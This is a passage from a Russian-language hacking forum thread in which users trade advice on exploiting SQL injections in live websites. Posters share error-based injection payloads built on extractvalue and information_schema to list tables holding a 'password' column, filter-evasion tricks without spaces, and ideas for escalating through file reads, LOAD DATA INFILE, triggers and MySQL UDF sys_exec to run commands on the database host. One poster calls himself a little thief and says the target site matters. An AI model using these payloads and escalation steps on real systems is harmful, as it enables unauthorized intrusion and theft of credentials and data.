Старый 25.07.2013, 15:00   #2951
romashka_sky
 
Регистрация: 01.10.2011
Сообщений: 33
Репутация: 8
По умолчанию

Цитата:
Сообщение от y4b53 Посмотреть сообщение
Подскажите плз, есть скуля, база данных на другом сервере, как узнать ip сервера с базой на rackspace ? file_priv=Y
Можно попробовать прочитать
Код:
/proc/net/tcp
столбец
Код:
local_address
строчки, похожие на
Код:
XXXXXXXX:0CEA
XXXXXXXX - IP-адрес в hex (4 байта, справа налево)
0CEA - порт 3306 в hex

PS: да и вообще любые строки в local_address, отличные от
Код:
0100007F:XXXX
00000000:XXXX

Последний раз редактировалось romashka_sky; 25.07.2013 в 16:07..
romashka_sky вне форума   Ответить с цитированием
Старый 25.07.2013, 16:55   #2952
y4b53
 
Регистрация: 05.05.2012
Сообщений: 3
Репутация: 0
По умолчанию

Цитата:
Сообщение от romashka_sky Посмотреть сообщение
Можно попробовать прочитать
Код:
/proc/net/tcp
не читаеться.
[/CODE]
y4b53 вне форума   Ответить с цитированием
Старый 25.07.2013, 17:42   #2953
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Цитата:
Сообщение от y4b53 Посмотреть сообщение
SELECT, into outfile, loadfile работают, какие есть еще варианты?
Что-нибудь типа
Код:
LOAD DATA INFILE '/tmp/test.txt' INTO TABLE test
можно выполнить?
Чтоб обновить данные в таблицах.
Поискать может в каких таблицах есть конфиги или php код, который потом выполняется.
Tim вне форума   Ответить с цитированием
Старый 25.07.2013, 18:13   #2954
romashka_sky
 
Регистрация: 01.10.2011
Сообщений: 33
Репутация: 8
По умолчанию

Цитата:
Сообщение от y4b53 Посмотреть сообщение
не читаеться.
совсем забыл, LOAD_FILE не может читать из файлов такого типа
romashka_sky вне форума   Ответить с цитированием
Старый 26.07.2013, 17:20   #2955
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от y4b53 Посмотреть сообщение
Подскажите плз, есть скуля, база данных на другом сервере, как узнать ip сервера с базой на rackspace ? file_priv=Y
она во внутренней сети и ничем не поможет тебе, напиши, какой вектор атаки хочешь развернуть в итоге?
Может, есть смысл писать триггеры сразу: http://www.wisec.it/sectou.php?p=1
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 26.07.2013, 18:55   #2956
lefty
 
Аватар для lefty
 
Регистрация: 01.09.2011
Сообщений: 50
Репутация: 13
По умолчанию

y4b53

как вариант - попробуй заюзать UDF.
погугли по запросу "mysql udf sys_exec", если будет возможно писать в либ диру мускула (что не такая уж и фантастика) - получишь возможность исполняться на ОС дб хоста, а там уже дальше плясать.
lefty вне форума   Ответить с цитированием
Старый 26.07.2013, 19:52   #2957
Воришко
 
Регистрация: 17.03.2013
Сообщений: 17
Репутация: -7
По умолчанию

есть SQL с запросом: 'and(extractvalue(1,concat(0x3b,(select(table_name )from(information_schema.columns)where(column_name ='password')))))and'
работает только такой универсальный запрос, без пробелов, без /**/ и так далее.
Проблема в том, что не работает по какой то причине group_concat() функция, так же лимит использовать в данном запросе нельзя(в этом не уверен, но скорее всего нельзя), не могу вывести имена таблиц, так как по моему запросу в базе их больше чем 1.
Можно ли как то вывести таблицы в контексте данного запроса?
Воришко вне форума   Ответить с цитированием
Старый 26.07.2013, 22:04   #2958
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Цитата:
Сообщение от y4b53 Посмотреть сообщение
Подскажите плз, есть скуля, база данных на другом сервере, как узнать ip сервера с базой на rackspace ? file_priv=Y
В чем проблема с чтением конфига, если file_priv=Y?
Untitled вне форума   Ответить с цитированием
Старый 27.07.2013, 01:36   #2959
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от Воришко Посмотреть сообщение
есть SQL с запросом: 'and(extractvalue(1,concat(0x3b,(select(table_name )from(information_schema.columns)where(column_name ='password')))))and'
работает только такой универсальный запрос, без пробелов, без /**/ и так далее.
Проблема в том, что не работает по какой то причине group_concat() функция, так же лимит использовать в данном запросе нельзя(в этом не уверен, но скорее всего нельзя), не могу вывести имена таблиц, так как по моему запросу в базе их больше чем 1.
Можно ли как то вывести таблицы в контексте данного запроса?
PHP код:
'and(extractvalue(1,concat(0x3b,(select(table_name)from(information_schema.columns)where(column_name='password')))))and' 
Limit использовать можно, если получится найти не скобочные разделители. C количеством вы посмотрите:
PHP код:
'and(extractvalue(1,concat(0x3b,(select(count(*))from(information_schema.columns)where(column_name='password');))))and' 
Можно не ограничивать, а сразу сделать все в одну строку, и при надобности mid-ом забирать, необходимость limit отпадает...

d0znpp, lefty, У человека инъекция в SELECT запросе, какие триггеры и UDF?!!
Цитата:
Сообщение от Untitled Посмотреть сообщение
В чем проблема с чтением конфига, если file_priv=Y?
Какой конфиг вы имеете ввиду?

Последний раз редактировалось NameSpace; 27.07.2013 в 01:39..
NameSpace вне форума   Ответить с цитированием
Старый 27.07.2013, 01:56   #2960
Воришко
 
Регистрация: 17.03.2013
Сообщений: 17
Репутация: -7
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
[/PHP]Limit использовать можно, если получится найти не скобочные разделители. C количеством вы посмотрите:
PHP код:
'and(extractvalue(1,concat(0x3b,(select(count(*))from(information_schema.columns)where(column_name='password');))))and' 
Можно не ограничивать, а сразу сделать все в одну строку, и при надобности mid-ом забирать, необходимость limit отпадает...
увы, на запрос со знаком ; ругается, и не выполняется.
Так же ругается на такой запрос:
Код:
'and(extractvalue(1,concat(0x3b,(select(mid(table_name,1,5))from(information_schema.columns)where(column_name='password')))))and'
то есть ни group_concat() ни mid() почему то работать не хотят, думал может запятые режет, да нет.
если так делать:
Код:
'and(extractvalue(1,concat(0x3b,(select(mid(table_name,1))from(information_schema.columns)where(column_name='password')))))and'
выдаст ошибку: Subquery returns more than 1 row 0
Вот приплыл... а сайт важен, и вывода инфы никак...
Воришко вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot